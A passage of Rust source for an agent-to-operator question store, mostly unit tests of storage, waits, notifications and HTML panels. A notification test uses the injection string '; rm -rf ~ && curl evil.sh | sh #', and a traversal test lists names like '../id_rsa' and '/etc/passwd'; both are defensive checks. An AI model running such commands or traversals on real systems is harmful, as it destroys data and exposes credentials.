1777 let table = [("{summary}", summary), ("{run}", run), ("{url}", url)];
1778 let mut out = String::with_capacity(template.len());
1779 let mut rest = template;
1780 while let Some(at) = rest.find('{') {
1781 out.push_str(&rest[..at]);
1782 let tail = &rest[at..];
1783 match table.iter().find(|(token, _)| tail.starts_with(token)) {
1784 Some((token, value)) => {
1785 out.push_str(value);
1786 rest = &tail[token.len()..];
1787 }
1788 None => {
1789 out.push('{');
1791 rest = &tail[1..];
1792 }
1793 }
1794 }
1795 out.push_str(rest);
1796 out
1797}
1798
1799fn web_url() -> String {
1801 question_url(&std::env::var(WEB_URL_ENV).unwrap_or_default())
1802}
1803
1804fn question_url(base: &str) -> String {
1811 let base = base.trim().trim_end_matches('/');
1812 if base.is_empty() || base.contains('#') {
1813 return base.to_owned();
1814 }
1815 format!("{base}/#/questions")
1816}
1817
1818fn fill_panel(dir: &Path, html: &str, assets: &[(String, &Path)]) -> Result<()> {
1823 let index = dir.join(PANEL_HTML);
1824 std::fs::write(&index, html).with_context(|| format!("write {}", index.display()))?;
1825 for (name, src) in assets {
1826 let dst = dir.join(name);
1827 std::fs::copy(src, &dst)
1828 .with_context(|| format!("copy {} to {}", src.display(), dst.display()))?;
1829 }
1830 Ok(())
1831}
1832
1833fn clear_dir(path: &Path) -> Result<()> {
1838 match std::fs::remove_dir_all(path) {
1839 Ok(()) => Ok(()),
1840 Err(e) if e.kind() == std::io::ErrorKind::NotFound => Ok(()),
1841 Err(e) => Err(e).with_context(|| format!("remove {}", path.display())),
1842 }
1843}
1844
1845fn read_path(path: &Path) -> Result<Question> {
1846 let body = std::fs::read_to_string(path).with_context(|| format!("read {}", path.display()))?;
1847 let q: Question =
1848 serde_json::from_str(&body).with_context(|| format!("parse {}", path.display()))?;
1849 if q.schema > SCHEMA {
1850 bail!(
1855 "question {} was written by a newer magi (schema {}, this build \
1856 only speaks up to {SCHEMA})",
1857 q.id,
1858 q.schema
1859 );
1860 }
1861 Ok(q)
1862}
1863
1864pub fn short_id(id: &str) -> &str {
1866 short(id)
1867}
1868
1869fn short(id: &str) -> &str {
1870 id.split('-').next_back().unwrap_or(id)
1871}
1872
1873fn new_id() -> String {
1874 let stamp = jiff::Zoned::now().strftime("%Y%m%d-%H%M%S");
1875 let seed = crate::rng::entropy();
1876 format!("{stamp}-{:04x}", (seed ^ (seed >> 32)) & 0xffff)
1877}
1878
1879#[cfg(test)]
1880mod tests {
1881 use super::*;
1882
1883 fn store() -> (tempfile::TempDir, Questions) {
1886 let dir = tempfile::tempdir().unwrap();
1887 let s = Questions::at(dir.path().join("questions"));
1888 (dir, s)
1889 }
1890
1891 #[test]
1892 fn deleting_a_run_stops_its_questions_asking() {
1893 let (_dir, store) = store();
1894
1895 let mut open_one = choice_question();
1896 store.put(&mut open_one).unwrap();
1897 let mut answered = free_question();
1898 answered
1899 .answer(Answer::Text("keep this".to_owned()))
1900 .unwrap();
1901 store.put(&mut answered).unwrap();
1902 let mut elsewhere = choice_question();
1903 elsewhere.run = "20260903-105039-3cbf".to_owned();
1904 store.put(&mut elsewhere).unwrap();
1905
1906 let n = store
1907 .abandon_for_run(&open_one.run, "run was deleted")
1908 .unwrap();
1909 assert_eq!(n, 1, "only the open question of that run");
1910
1911 let back = store.get(&open_one.id).unwrap();
1912 assert!(!back.status.open(), "it no longer asks for a decision");
1913 assert!(
1914 back.detail.contains("run was deleted"),
1915 "the operator can see why: {}",
1916 back.detail
1917 );
1918
1919 let kept = store.get(&answered.id).unwrap();
1920 assert_eq!(
1921 kept.status,
1922 QuestionStatus::Answered,
1923 "an answered question is a decision on record, not something to revoke"
1924 );
1925 assert!(
1926 store.get(&elsewhere.id).unwrap().status.open(),
1927 "another run's question is untouched"
1928 );
1929 assert!(store.open_for(&open_one.run).is_empty());
1930 }
1931
1932 #[test]
1933 fn settle_run_abandons_only_for_a_status_that_is_not_resumable() {
1934 let (_dir, store) = store();
1935 let mut q = choice_question();
1936 store.put(&mut q).unwrap();
1937
1938 let n = store.settle_run(&q.run, RunStatus::Blocked).unwrap();
1940 assert_eq!(n, 0);
1941 assert!(store.get(&q.id).unwrap().status.open());
1942
1943 let n = store.settle_run(&q.run, RunStatus::Failed).unwrap();
1946 assert_eq!(n, 1);
1947 let back = store.get(&q.id).unwrap();
1948 assert!(!back.status.open());
1949 assert!(back.detail.contains(&q.run) && back.detail.contains("failed"));
1950
1951 assert_eq!(store.settle_run(&q.run, RunStatus::Failed).unwrap(), 0);
1953 }
1954
1955 fn choice_question() -> Question {
1956 Question::new(
1957 "20260902-201256-9fb7".to_owned(),
1958 "implement".to_owned(),
1959 "impl-A".to_owned(),
1960 "Which storage backend should the cache use?".to_owned(),
1961 "Both are already dependencies.".to_owned(),
1962 vec!["SQLite".to_owned(), "Redis".to_owned()],
1963 )
1964 }
1965
1966 fn free_question() -> Question {
1967 Question::new(
1968 "20260902-201256-9fb7".to_owned(),
1969 "review".to_owned(),
1970 "rev-1".to_owned(),
1971 "What should the error message say?".to_owned(),
1972 String::new(),
1973 Vec::new(),
1974 )
1975 }
1976
1977 fn quiet() -> config::Notify {
1979 config::Notify::default()
1980 }
1981
1982 #[test]
1983 fn the_stored_json_is_the_shape_the_web_ui_was_written_against() {
1984 let mut q = choice_question();
1988 q.id = "20260902-231501-ab12".to_owned();
1989 let open: serde_json::Value = serde_json::to_value(&q).unwrap();
1990 let keys: Vec<&str> = open
1994 .as_object()
1995 .unwrap()
1996 .keys()
1997 .map(String::as_str)
1998 .collect();
1999 assert_eq!(
2000 keys,
2001 [
2002 "actions",
2003 "answer",
2004 "answer_delivered",
2005 "answer_timeout",
2006 "answered_at",
2007 "asked_at",
2008 "assets",
2009 "choices",
2010 "cwd",
2011 "delivered_turns",
2012 "deputy",
2013 "detail",
2014 "id",
2015 "node",
2016 "panel",
2017 "run",
2018 "schema",
2019 "seat",
2020 "status",
2021 "summary",
2022 "thread",
2023 "waiter",
2024 ],
2025 "the on-disk field set is a contract with the front end"
2026 );
2027 assert_eq!(open["schema"], 5);
2028 assert_eq!(open["thread"], serde_json::json!([]));
2029 assert_eq!(open["id"], "20260902-231501-ab12");
2030 assert_eq!(open["run"], "20260902-201256-9fb7");
2031 assert_eq!(open["node"], "implement");
2032 assert_eq!(open["seat"], "impl-A");
2033 assert_eq!(open["status"], "open");
2034 assert_eq!(open["choices"], serde_json::json!(["SQLite", "Redis"]));
2035 assert_eq!(open["answered_at"], serde_json::Value::Null);
2036 assert_eq!(open["answer"], serde_json::Value::Null);
2037 let asked = open["asked_at"].as_str().unwrap();
2038 assert!(
2039 asked.ends_with('Z') && asked.contains('T'),
2040 "timestamps are UTC RFC 3339, which is what `new Date()` parses: {asked}"
2041 );
2042
2043 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2045 let answered = serde_json::to_value(&q).unwrap();
2046 assert_eq!(answered["status"], "answered");
2047 assert_eq!(answered["answer"], serde_json::json!({"choice": "SQLite"}));
2048 assert!(answered["answered_at"].is_string());
2049
2050 let mut free = free_question();
2052 free.answer(Answer::Text("Say which file it was".to_owned()))
2053 .unwrap();
2054 assert_eq!(
2055 serde_json::to_value(&free).unwrap()["answer"],
2056 serde_json::json!({"text": "Say which file it was"})
2057 );
2058
2059 let body = serde_json::to_string(&q).unwrap();
2061 assert_eq!(serde_json::from_str::<Question>(&body).unwrap(), q);
2062 }
2063
2064 #[test]
2065 fn an_answer_the_question_never_offered_is_refused_with_its_own_reason() {
2066 let mut unoffered = choice_question();
2069 let a = unoffered
2070 .answer(Answer::Choice("Postgres".to_owned()))
2071 .unwrap_err()
2072 .to_string();
2073
2074 let mut typed = choice_question();
2075 let b = typed
2076 .answer(Answer::Text("use Postgres".to_owned()))
2077 .unwrap_err()
2078 .to_string();
2079
2080 let mut blank = free_question();
2081 let c = blank
2082 .answer(Answer::Text(" \n".to_owned()))
2083 .unwrap_err()
2084 .to_string();
2085
2086 let mut twice = choice_question();
2087 twice.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2088 let d = twice
2089 .answer(Answer::Choice("Redis".to_owned()))
2090 .unwrap_err()
2091 .to_string();
2092
2093 assert!(a.contains("not one of the choices"), "{a}");
2094 assert!(b.contains("multiple choice"), "{b}");
2095 assert!(c.contains("empty"), "{c}");
2096 assert!(d.contains("already answered"), "{d}");
2097 let mut distinct = vec![a, b, c, d];
2098 let asked = distinct.len();
2099 distinct.sort_unstable();
2100 distinct.dedup();
2101 assert_eq!(distinct.len(), asked, "each rejection is distinguishable");
2102
2103 assert_eq!(unoffered.status, QuestionStatus::Open);
2105 assert_eq!(typed.status, QuestionStatus::Open);
2106 assert_eq!(blank.status, QuestionStatus::Open);
2107 assert_eq!(twice.resolution().as_deref(), Some("SQLite"));
2109
2110 let mut free = free_question();
2112 let e = free
2113 .answer(Answer::Choice("SQLite".to_owned()))
2114 .unwrap_err()
2115 .to_string();
2116 assert!(e.contains("free text"), "{e}");
2117 }
2118
2119 #[test]
2120 fn open_questions_are_listed_before_answered_ones() {
2121 let (_dir, s) = store();
2122 let mut old_open = choice_question();
2125 old_open.id = "20260101-000001-aaaa".to_owned();
2126 let mut new_open = choice_question();
2127 new_open.id = "20260101-000002-bbbb".to_owned();
2128 let mut answered = choice_question();
2129 answered.id = "20260101-000003-cccc".to_owned();
2130 answered.answer(Answer::Choice("Redis".to_owned())).unwrap();
2131 for q in [&mut old_open, &mut new_open, &mut answered] {
2132 s.put(q).unwrap();
2133 }
2134
2135 let ids: Vec<String> = s.list().into_iter().map(|q| q.id).collect();
2136 assert_eq!(
2137 ids,
2138 [
2139 "20260101-000002-bbbb",
2140 "20260101-000001-aaaa",
2141 "20260101-000003-cccc"
2142 ],
2143 "what has stopped work comes first; history sorts underneath"
2144 );
2145 assert_eq!(s.count_open(), 2);
2146 assert_eq!(s.open_for("20260902-201256-9fb7").len(), 2);
2147 assert!(s.open_for("some-other-run").is_empty());
2148 assert_eq!(s.resolve_id("bbbb").unwrap(), "20260101-000002-bbbb");
2150 assert!(s.get("20260101-000002-bbbb").is_ok());
2151 assert!(s.resolve_id("nope").is_err());
2152 assert!(
2153 s.revision() > 0,
2154 "the store's mtime drives the phone's polling"
2155 );
2156 }
2157
2158 #[test]
2159 fn a_question_file_magi_cannot_read_does_not_take_the_listing_down() {
2160 let (_dir, s) = store();
2161 let mut good = choice_question();
2162 s.put(&mut good).unwrap();
2163 std::fs::write(s.path_of("20260101-000009-dead"), "{\"schema\": 1, \"id\"").unwrap();
2165 let future = serde_json::json!({
2166 "schema": 99, "id": "20260101-000010-beef", "run": "r", "node": "n",
2167 "seat": "s", "summary": "?", "detail": "", "choices": [],
2168 "status": "open", "asked_at": "2026-01-01T00:00:00Z",
2169 "answered_at": null, "answer": null,
2170 });
2171 std::fs::write(
2172 s.path_of("20260101-000010-beef"),
2173 serde_json::to_string(&future).unwrap(),
2174 )
2175 .unwrap();
2176
2177 let listed = s.list();
2178 assert_eq!(listed.len(), 1, "one bad file must not hide the open one");
2179 assert_eq!(listed[0].id, good.id);
2180 let e = s.get("20260101-000010-beef").unwrap_err().to_string();
2182 assert!(e.contains("schema"), "{e}");
2183 }
2184
2185 #[tokio::test]
2186 async fn the_wait_returns_the_answer_another_process_wrote() {
2187 let (dir, s) = store();
2192 let mut q = choice_question();
2193 let id = q.id.clone();
2194 let writer = Questions::at(dir.path().join("questions"));
2195 let handle = tokio::spawn(async move {
2196 tokio::time::sleep(Duration::from_millis(30)).await;
2197 let mut fresh = writer.get(&id).expect("the question was filed first");
2198 fresh.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2199 writer.put(&mut fresh).unwrap();
2200 });
2201
2202 let got = wait_for_owner(
2203 &mut q,
2204 &s,
2205 &quiet(),
2206 Duration::from_secs(5),
2207 Duration::from_millis(10),
2208 )
2209 .await
2210 .unwrap();
2211
2212 handle.await.unwrap();
2213 assert_eq!(got, Wait::Answered("SQLite".to_owned()));
2214 assert_eq!(
2215 q.status,
2216 QuestionStatus::Answered,
2217 "the caller's copy is refreshed from the answering process's record"
2218 );
2219 assert!(q.answered_at.is_some());
2220 }
2221
2222 #[tokio::test]
2223 async fn a_question_nobody_answers_is_abandoned_not_deleted() {
2224 let (_dir, s) = store();
2225 let mut q = choice_question();
2226
2227 let got = wait_for_owner(
2228 &mut q,
2229 &s,
2230 &quiet(),
2231 Duration::from_millis(60),
2232 Duration::from_millis(10),
2233 )
2234 .await
2235 .unwrap();
2236
2237 assert_eq!(
2238 got,
2239 Wait::Abandoned,
2240 "a slow human is not an error; the run parks"
2241 );
2242 assert_eq!(q.status, QuestionStatus::Abandoned);
2243 let on_disk = s.get(&q.id).expect("the record of what was asked survives");
2244 assert_eq!(on_disk.status, QuestionStatus::Abandoned);
2245 assert!(
2246 on_disk.detail.contains("Abandoned:"),
2247 "why nobody answered belongs with the question: {}",
2248 on_disk.detail
2249 );
2250 assert!(on_disk.resolution().is_none());
2251 assert_eq!(s.count_open(), 0);
2252 }
2253
2254 #[tokio::test]
2255 async fn a_slice_running_out_leaves_the_question_open_rather_than_abandoning_it() {
2256 let (_dir, s) = store();
2261 let mut q = choice_question();
2262 s.put(&mut q).unwrap();
2263
2264 let got = wait_loop(
2265 &mut q,
2266 &s,
2267 Duration::from_secs(3600),
2268 Duration::from_millis(30),
2269 Duration::from_millis(10),
2270 )
2271 .await
2272 .unwrap();
2273
2274 assert_eq!(
2275 got,
2276 Wait::Pending,
2277 "the clock on this call ran out, not the owner's patience"
2278 );
2279 assert_eq!(
2280 q.status,
2281 QuestionStatus::Open,
2282 "a slice expiring must never abandon the question"
2283 );
2284 let on_disk = s.get(&q.id).expect("still on disk, still open");
2285 assert_eq!(
2286 on_disk.status,
2287 QuestionStatus::Open,
2288 "nothing about the record changed just because this call gave up"
2289 );
2290 }
2291
2292 #[tokio::test]
2293 async fn a_wait_resumed_after_a_slice_sees_the_answer_the_first_slice_missed() {
2294 let (dir, s) = store();
2299 let mut q = choice_question();
2300 s.put(&mut q).unwrap();
2301
2302 let first = wait_loop(
2303 &mut q,
2304 &s,
2305 Duration::from_secs(3600),
2306 Duration::from_millis(30),
2307 Duration::from_millis(10),
2308 )
2309 .await
2310 .unwrap();
2311 assert_eq!(first, Wait::Pending);
2312
2313 let id = q.id.clone();
2314 let writer = Questions::at(dir.path().join("questions"));
2315 let mut fresh = writer.get(&id).unwrap();
2316 fresh.answer(Answer::Choice("Redis".to_owned())).unwrap();
2317 writer.put(&mut fresh).unwrap();
2318
2319 let second = resume_wait(&mut q, &s, Duration::from_millis(500))
2324 .await
2325 .unwrap();
2326 assert_eq!(second, Wait::Answered("Redis".to_owned()));
2327 assert_eq!(q.status, QuestionStatus::Answered);
2328 }
2329
2330 #[tokio::test]
2331 async fn a_reply_left_in_the_gap_before_a_resumed_wait_starts_is_never_missed() {
2332 let (dir, s) = store();
2342 let mut q = choice_question();
2343 s.put(&mut q).unwrap();
2344
2345 let first = wait_loop(
2346 &mut q,
2347 &s,
2348 Duration::from_secs(3600),
2349 Duration::from_millis(30),
2350 Duration::from_millis(10),
2351 )
2352 .await
2353 .unwrap();
2354 assert_eq!(first, Wait::Pending);
2355
2356 let id = q.id.clone();
2358 let writer = Questions::at(dir.path().join("questions"));
2359 let mut fresh = writer.get(&id).unwrap();
2360 fresh.say("why not Postgres?").unwrap();
2361 writer.put(&mut fresh).unwrap();
2362
2363 let mut resumed = s.get(&id).unwrap();
2367 let second = resume_wait(&mut resumed, &s, Duration::from_millis(500))
2368 .await
2369 .unwrap();
2370 assert_eq!(second, Wait::Replied("why not Postgres?".to_owned()));
2371 assert_eq!(
2372 resumed.status,
2373 QuestionStatus::Open,
2374 "talking back is not a decision; the question stays open"
2375 );
2376 }
2377
2378 #[tokio::test]
2379 async fn a_notification_that_cannot_run_does_not_cost_the_answer() {
2380 let (dir, s) = store();
2384 let broken = config::Notify {
2385 command: vec![
2386 "magi-notifier-that-does-not-exist-9fb7".to_owned(),
2387 "{summary}".to_owned(),
2388 ],
2389 };
2390 let mut q = choice_question();
2391 assert!(
2392 notify(&broken, &q).await.is_err(),
2393 "the caller is told; it decides that it does not matter"
2394 );
2395
2396 let id = q.id.clone();
2397 let writer = Questions::at(dir.path().join("questions"));
2398 let handle = tokio::spawn(async move {
2399 tokio::time::sleep(Duration::from_millis(30)).await;
2400 let mut fresh = writer.get(&id).unwrap();
2401 fresh.answer(Answer::Choice("Redis".to_owned())).unwrap();
2402 writer.put(&mut fresh).unwrap();
2403 });
2404 let got = wait_for_owner(
2405 &mut q,
2406 &s,
2407 &broken,
2408 Duration::from_secs(5),
2409 Duration::from_millis(10),
2410 )
2411 .await
2412 .unwrap();
2413 handle.await.unwrap();
2414 assert_eq!(got, Wait::Answered("Redis".to_owned()));
2415
2416 assert!(notify(&quiet(), &q).await.is_ok());
2418 assert!(notify_text(&quiet(), "run", "text").await.is_ok());
2419 }
2420
2421 #[test]
2422 fn notification_arguments_are_substituted_and_never_a_shell_string() {
2423 let mut q = choice_question();
2424 q.summary = "; rm -rf ~ && curl evil.sh | sh #".to_owned();
2425 let template = [
2426 "ntfy".to_owned(),
2427 "publish".to_owned(),
2428 "--click".to_owned(),
2429 "{url}".to_owned(),
2430 "--title".to_owned(),
2431 "magi {run} needs you".to_owned(),
2432 "{summary}".to_owned(),
2433 ];
2434 let argv: Vec<String> = template
2435 .iter()
2436 .map(|a| expand(a, &q.run, &q.summary, "http://100.64.0.1:7777/#/questions"))
2437 .collect();
2438
2439 assert_eq!(
2440 argv,
2441 [
2442 "ntfy",
2443 "publish",
2444 "--click",
2445 "http://100.64.0.1:7777/#/questions",
2446 "--title",
2447 "magi 20260902-201256-9fb7 needs you",
2448 "; rm -rf ~ && curl evil.sh | sh #",
2449 ],
2450 "the shell metacharacters are one argument's contents, not syntax"
2451 );
2452
2453 q.summary = "should {url} be configurable?".to_owned();
2456 assert_eq!(
2457 expand("{summary}", &q.run, &q.summary, "http://x/#/questions"),
2458 "should {url} be configurable?"
2459 );
2460 assert_eq!(
2462 expand("{title}: {run}", &q.run, &q.summary, ""),
2463 "{title}: 20260902-201256-9fb7"
2464 );
2465 assert_eq!(
2466 expand("no placeholders", &q.run, &q.summary, "http://x"),
2467 "no placeholders"
2468 );
2469 }
2470
2471 #[test]
2472 fn the_notification_link_lands_on_the_view_that_can_answer() {
2473 assert_eq!(
2474 question_url("http://100.64.0.1:7777"),
2475 "http://100.64.0.1:7777/#/questions"
2476 );
2477 assert_eq!(
2478 question_url("http://100.64.0.1:7777/"),
2479 "http://100.64.0.1:7777/#/questions"
2480 );
2481 assert_eq!(
2483 question_url("http://magi.ts.net/#/runs"),
2484 "http://magi.ts.net/#/runs"
2485 );
2486 assert_eq!(question_url(" "), "");
2488 }
2489
2490 fn panelled() -> Question {
2492 let mut q = choice_question();
2493 q.id = "20260903-014455-ab12".to_owned();
2494 q
2495 }
2496
2497 #[test]
2498 fn a_panel_round_trips_verbatim_with_its_assets_listed_sorted() {
2499 let (dir, s) = store();
2500 let work = dir.path().join("worktree");
2501 std::fs::create_dir_all(&work).unwrap();
2502 std::fs::write(work.join("diff.svg"), "<svg/>").unwrap();
2503 std::fs::write(work.join("table.png"), b"\x89PNG").unwrap();
2504
2505 let mut q = panelled();
2506 let html = "<h1>Merge?</h1>\n<img src=\"asset/diff.svg\">\n";
2507 s.put_panel(
2508 &mut q,
2509 html,
2510 &[work.join("table.png"), work.join("diff.svg")],
2511 )
2512 .unwrap();
2513 s.put(&mut q).unwrap();
2514
2515 assert!(q.panel);
2516 assert_eq!(
2517 q.assets,
2518 ["diff.svg", "table.png"],
2519 "sorted, not in the order the agent happened to pass them"
2520 );
2521 assert_eq!(
2522 s.panel_html(&q.id).as_deref(),
2523 Some(html),
2524 "the html is stored byte for byte; the agent authored the markup"
2525 );
2526 assert_eq!(
2527 s.panel_asset(&q.id, "diff.svg").unwrap().as_deref(),
2528 Some(&b"<svg/>"[..])
2529 );
2530
2531 let body = std::fs::read_to_string(s.path_of(&q.id)).unwrap();
2533 let json: serde_json::Value = serde_json::from_str(&body).unwrap();
2534 assert_eq!(json["panel"], true);
2535 assert_eq!(json["assets"], serde_json::json!(["diff.svg", "table.png"]));
2536 let back = s.get(&q.id).unwrap();
2537 assert!(back.panel);
2538 assert_eq!(back.assets, q.assets);
2539
2540 std::fs::remove_dir_all(&work).unwrap();
2543 assert_eq!(
2544 s.panel_asset(&q.id, "table.png").unwrap().as_deref(),
2545 Some(&b"\x89PNG"[..]),
2546 "a referenced asset would be gone with the worktree"
2547 );
2548 }
2549
2550 #[test]
2551 fn a_traversal_asset_name_is_refused_before_the_filesystem_is_touched() {
2552 let (dir, s) = store();
2553 let mut q = panelled();
2554 s.put_panel(&mut q, "<p>ok</p>", &[]).unwrap();
2555 s.put(&mut q).unwrap();
2556
2557 let secret = "this must never reach the browser";
2560 std::fs::write(s.root().join("id_rsa"), secret).unwrap();
2561 assert_eq!(
2562 std::fs::read_to_string(s.panel_dir(&q.id).join("../id_rsa")).unwrap(),
2563 secret,
2564 "the traversal is real: the operating system resolves this path \
2565 happily, which is why the name has to be refused before the join"
2566 );
2567
2568 let long = "x".repeat(200);
2569 for name in [
2570 "..",
2571 "../id_rsa",
2572 "..\\id_rsa",
2573 "sub/../id_rsa",
2574 "/",
2575 "\\",
2576 "/etc/passwd",
2577 "C:\\Windows\\win.ini",
2578 "",
2579 ".hidden",
2580 ".",
2581 long.as_str(),
2582 ] {
2583 assert!(!valid_asset_name(name), "`{name}` must fail the pattern");
2584 let e = s.panel_asset(&q.id, name).unwrap_err().to_string();
2585 assert!(
2586 e.contains("not a panel file name"),
2587 "`{name}` must be refused as a name, not attempted: {e}"
2588 );
2589 assert!(!e.contains(secret), "`{name}` reached the filesystem: {e}");
2590 }
2591 assert!(s.panel_asset(&q.id, "index.html").unwrap().is_some());
2594
2595 let hidden = dir.path().join(".hidden");
2598 std::fs::write(&hidden, "x").unwrap();
2599 let e = s
2600 .put_panel(&mut q, "<p>replacement</p>", &[hidden])
2601 .unwrap_err()
2602 .to_string();
2603 assert!(e.contains(".hidden") && e.contains("A-Za-z0-9"), "{e}");
2604 assert_eq!(s.panel_html(&q.id).as_deref(), Some("<p>ok</p>"));
2605 assert!(q.assets.is_empty());
2606 }
2607
2608 #[test]
2609 fn the_panel_size_cap_refuses_an_oversized_asset_set_and_writes_nothing() {
2610 let (dir, s) = store();
2611 let mut q = panelled();
2612 s.put(&mut q).unwrap();
2613
2614 let big = dir.path().join("recording.png");
2617 std::fs::File::create(&big)
2618 .unwrap()
2619 .set_len(PANEL_MAX_BYTES)
2620 .unwrap();
2621
2622 let html = "<p>see the recording</p>";
2623 let total = PANEL_MAX_BYTES + html.len() as u64;
2624 let e = s.put_panel(&mut q, html, &[big]).unwrap_err().to_string();
2625 assert!(
2626 e.contains(&PANEL_MAX_BYTES.to_string()),
2627 "the cap is named so the agent knows the limit: {e}"
2628 );
2629 assert!(
2630 e.contains(&total.to_string()),
2631 "the actual size is named so the agent knows by how much: {e}"
2632 );
2633
2634 assert!(!q.panel);
2635 assert!(q.assets.is_empty());
2636 let left: Vec<String> = std::fs::read_dir(s.root())
2637 .unwrap()
2638 .map(|e| e.unwrap().file_name().to_string_lossy().into_owned())
2639 .collect();
2640 assert_eq!(
2641 left,
2642 [format!("{}.json", q.id)],
2643 "a refused panel leaves neither a directory nor scratch: {left:?}"
2644 );
2645 }
2646
2647 #[test]
2648 fn two_assets_sharing_a_base_name_are_refused_rather_than_one_hiding_the_other() {
2649 let (dir, s) = store();
2650 let (before, after) = (dir.path().join("before"), dir.path().join("after"));
2651 std::fs::create_dir_all(&before).unwrap();
2652 std::fs::create_dir_all(&after).unwrap();
2653 std::fs::write(before.join("diff.png"), "before").unwrap();
2654 std::fs::write(after.join("diff.png"), "after").unwrap();
2655
2656 let mut q = panelled();
2657 let e = s
2658 .put_panel(
2659 &mut q,
2660 "<p>x</p>",
2661 &[before.join("diff.png"), after.join("diff.png")],
2662 )
2663 .unwrap_err()
2664 .to_string();
2665 assert!(e.contains("diff.png"), "{e}");
2666 assert!(
2667 e.contains("before") && e.contains("after"),
2668 "both sources are named, because the fix is to rename one: {e}"
2669 );
2670 assert!(!q.panel);
2671 assert!(!s.panel_dir(&q.id).exists());
2672 }
2673
2674 #[test]
2675 fn storing_a_panel_twice_replaces_it_rather_than_merging_two_attempts() {
2676 let (dir, s) = store();
2677 std::fs::write(dir.path().join("old.png"), "old").unwrap();
2678 std::fs::write(dir.path().join("new.png"), "new").unwrap();
2679
2680 let mut q = panelled();
2681 s.put_panel(&mut q, "<p>first</p>", &[dir.path().join("old.png")])
2682 .unwrap();
2683 s.put_panel(&mut q, "<p>second</p>", &[dir.path().join("new.png")])
2684 .unwrap();
2685
2686 assert_eq!(q.assets, ["new.png"]);
2687 assert_eq!(s.panel_html(&q.id).as_deref(), Some("<p>second</p>"));
2688 assert!(
2689 s.panel_asset(&q.id, "old.png").unwrap().is_none(),
2690 "an asset from the first attempt would show a mix of two answers"
2691 );
2692
2693 s.drop_panel(&q.id).unwrap();
2694 assert!(s.panel_html(&q.id).is_none());
2695 assert!(!s.panel_dir(&q.id).exists());
2696 s.drop_panel(&q.id)
2697 .expect("dropping a panel that is already gone is the desired state");
2698 }
2699
2700 #[test]
2701 fn a_question_with_no_panel_reports_none_rather_than_an_error() {
2702 let (_dir, s) = store();
2703 let mut q = panelled();
2704 s.put(&mut q).unwrap();
2705
2706 assert!(!q.panel);
2707 assert!(s.panel_html(&q.id).is_none());
2708 assert!(
2709 s.panel_asset(&q.id, "diff.svg").unwrap().is_none(),
2710 "a missing file is a 404 for the caller, not a failure of the store"
2711 );
2712 let json = serde_json::to_value(&q).unwrap();
2713 assert_eq!(json["panel"], false);
2714 assert_eq!(json["assets"], serde_json::json!([]));
2715
2716 let e = s.put_panel(&mut q, " \n", &[]).unwrap_err().to_string();
2719 assert!(e.contains("empty panel"), "{e}");
2720 assert!(!s.panel_dir(&q.id).exists());
2721 }
2722
2723 #[test]
2724 fn a_question_written_before_panels_existed_still_deserialises() {
2725 let (_dir, s) = store();
2726 std::fs::create_dir_all(s.root()).unwrap();
2727 let id = "20260902-231501-ab12";
2728 let body = r#"{
2730 "schema": 1,
2731 "id": "20260902-231501-ab12",
2732 "run": "20260902-201256-9fb7",
2733 "node": "implement",
2734 "seat": "impl-A",
2735 "summary": "Which storage backend should the cache use?",
2736 "detail": "Both are already dependencies.",
2737 "choices": ["SQLite", "Redis"],
2738 "status": "open",
2739 "asked_at": "2026-09-02T23:15:01Z",
2740 "answered_at": null,
2741 "answer": null
2742}"#;
2743 std::fs::write(s.path_of(id), body).unwrap();
2744
2745 let q = s.get(id).unwrap();
2746 assert!(
2747 !q.panel,
2748 "an absent field means no panel, not a parse error"
2749 );
2750 assert!(q.assets.is_empty());
2751 assert_eq!(q.schema, 1);
2756 assert!(q.thread.is_empty());
2757 assert_eq!(
2758 q.answer_timeout, 0,
2759 "an absent field means unrecorded, not a zero-second deadline"
2760 );
2761 assert!(!q.waiting_on_agent());
2762 assert_eq!(q.summary, "Which storage backend should the cache use?");
2763 assert_eq!(
2764 s.list().len(),
2765 1,
2766 "and it is still listed; skipping it would hide an open question"
2767 );
2768 }
2769
2770 fn turn(who: Who, body: &str, at: Timestamp) -> Turn {
2771 Turn {
2772 who,
2773 body: body.to_owned(),
2774 at,
2775 }
2776 }
2777
2778 #[test]
2779 fn a_turn_round_trips_as_who_body_at_with_two_named_speakers() {
2780 let mut q = choice_question();
2783 q.thread
2784 .push(turn(Who::Operator, "why not Postgres?", Timestamp::now()));
2785 let value = serde_json::to_value(&q.thread[0]).unwrap();
2786 let mut keys: Vec<&str> = value
2787 .as_object()
2788 .unwrap()
2789 .keys()
2790 .map(String::as_str)
2791 .collect();
2792 keys.sort_unstable();
2793 assert_eq!(keys, ["at", "body", "who"]);
2794 assert_eq!(value["who"], "operator");
2795 assert_eq!(value["body"], "why not Postgres?");
2796
2797 let agent_turn = serde_json::json!({"who": "agent", "body": "hi", "at": value["at"]});
2798 let parsed: Turn = serde_json::from_value(agent_turn).unwrap();
2799 assert_eq!(parsed.who, Who::Agent);
2800 }
2801
2802 #[test]
2803 fn a_merge_approval_settles_only_on_a_clear_unhedged_merge() {
2804 let mut q = Question::new(
2805 "run".into(),
2806 crate::land::APPROVAL_NODE.into(),
2807 "land".into(),
2808 "Merge?".into(),
2809 String::new(),
2810 vec!["merge".into(), "hold".into()],
2811 );
2812 let mut dep = Deputy::new("brief".into());
2813 dep.seat = Some(crate::agent::SeatState::new("deputy-x", "alpha", 1));
2814 q.deputy = Some(dep);
2815 q.say("please don't merge yet").unwrap();
2816 assert!(q.settle_by_deputy("deputy-x", "merge", "merge").is_err());
2817 assert!(
2818 q.settle_by_deputy("deputy-x", "merge", "don't merge")
2819 .is_err()
2820 );
2821 assert!(
2822 q.settle_by_deputy("deputy-x", "hold", "don't merge")
2823 .is_err()
2824 );
2825 assert_eq!(q.status, QuestionStatus::Open);
2826 q.reply("do you mean hold?", vec!["merge".into(), "hold".into()])
2827 .unwrap();
2828 q.say(" Merge ").unwrap();
2829 assert!(
2830 q.settle_by_deputy("deputy-x", "merge", "erge").is_err(),
2831 "a fragment is not the word"
2832 );
2833 q.settle_by_deputy("deputy-x", "merge", "Merge").unwrap();
2834 assert_eq!(q.resolution().as_deref(), Some("merge"));
2835 }
2836
2837 #[test]
2838 fn a_clear_merge_among_other_requests_settles_but_a_hedge_does_not() {
2839 let mut q = Question::new(
2840 "run".into(),
2841 crate::land::APPROVAL_NODE.into(),
2842 "land".into(),
2843 "Merge?".into(),
2844 String::new(),
2845 vec!["merge".into(), "hold".into()],
2846 );
2847 let mut dep = Deputy::new("brief".into());
